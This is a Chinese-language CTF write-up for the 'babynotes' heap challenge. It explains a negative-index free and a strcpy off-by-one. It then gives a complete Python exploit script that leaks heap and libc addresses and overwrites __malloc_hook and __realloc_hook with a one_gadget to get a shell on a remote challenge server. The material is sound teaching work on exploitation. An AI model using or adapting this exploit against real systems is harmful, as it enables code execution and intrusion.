漏洞点1,删除note时索引可以输入负值:
配合下面的数据结构,可以free掉buf_motto和buf_name的指针:
漏洞点2,注册用户时输入name为24个字节时会把age通过strcpy附上,造成offbyone类似的效果:
思路就是先通过删除-1和-2两个note来泄露heap和libc基址,然后通过fastbin攻击修改malloc_hook,realloc_hook来完成getshell
具体exp如下:
#coding:utf8
from PwnContext import *
#context.log_level = "debug"
ctx.binary = './babynotes'
ctx.remote = ('123.56.170.202', 43121)
ctx.remote_libc = './libc-2.23.so'
e=ctx.remote_libc
malloc_hook=e.symbols['__malloc_hook']
free_hook=e.symbols['__free_hook']
system=e.symbols['system']
realloc=e.symbols['realloc']
gadget=0xf1207
ctx.breakpoints = [0x400A94]
ctx.debug_remote_libc = True
#ctx.start()
ctx.start('remote')
def add(index, size):
ctx.sendlineafter(">> ","1")
ctx.sendlineafter("Input index:",str(index))
ctx.sendlineafter("Input note size:",str(size))
def show(index):
ctx.sendlineafter(">> ","2")
ctx.sendlineafter("Input index:",str(index))
def delete(index):
ctx.sendlineafter(">> ","3")
ctx.sendlineafter("Input index:",str(index))
def edit(index,name):
ctx.sendlineafter(">> ","4")
ctx.sendlineafter("Input index:",str(index))
ctx.sendafter("Input your note:",name)
def register(name,motto,age):
ctx.sendafter("Input your name:",name)
ctx.sendlineafter("Input your motto:",motto)
ctx.sendlineafter("Input your age:",age)
register('test','motto',"100")
add(1,0x18)
add(2,0x88)
add(4,0x8)
add(5,0x8)
delete(1)
delete(-1)
delete(-2)
ctx.sendlineafter(">> ","6")
ctx.recvuntil("Name: ")
heap_addr=u64(ctx.recvuntil("\n")[:-1].ljust(8,'\x00'))
ctx.recvuntil("Motto: ")
main_arena=u64(ctx.recv(6).ljust(8,'\x00'))
log.info("0x%0x,0x%0x"%(heap_addr,main_arena))
libc_base=(main_arena-0x58)-((malloc_hook+0x20)&0xffffffffffe0)#calculate by main_arena
log.info("0x%0x"%libc_base)
topchunk=heap_addr+0x1a8
delete(2)
add(0,0x18)
ctx.debug()
ctx.sendlineafter(">>","5")
register('A'*0x18,"/bin/sh\x00",str(0x101))
delete(0)
add(0,0xf8)
add(1,0x68)
delete(1)
edit(0,p64(0)*25+p64(0x71)+p64(libc_base+malloc_hook-0x20-3))
add(1,0x68)
add(2,0x68)
edit(2,"\x00"*3+p64(0)+p64(libc_base+gadget)+p64(libc_base+realloc+8)) #realloc
delete(1)
add(1,0x10)
ctx.interactive()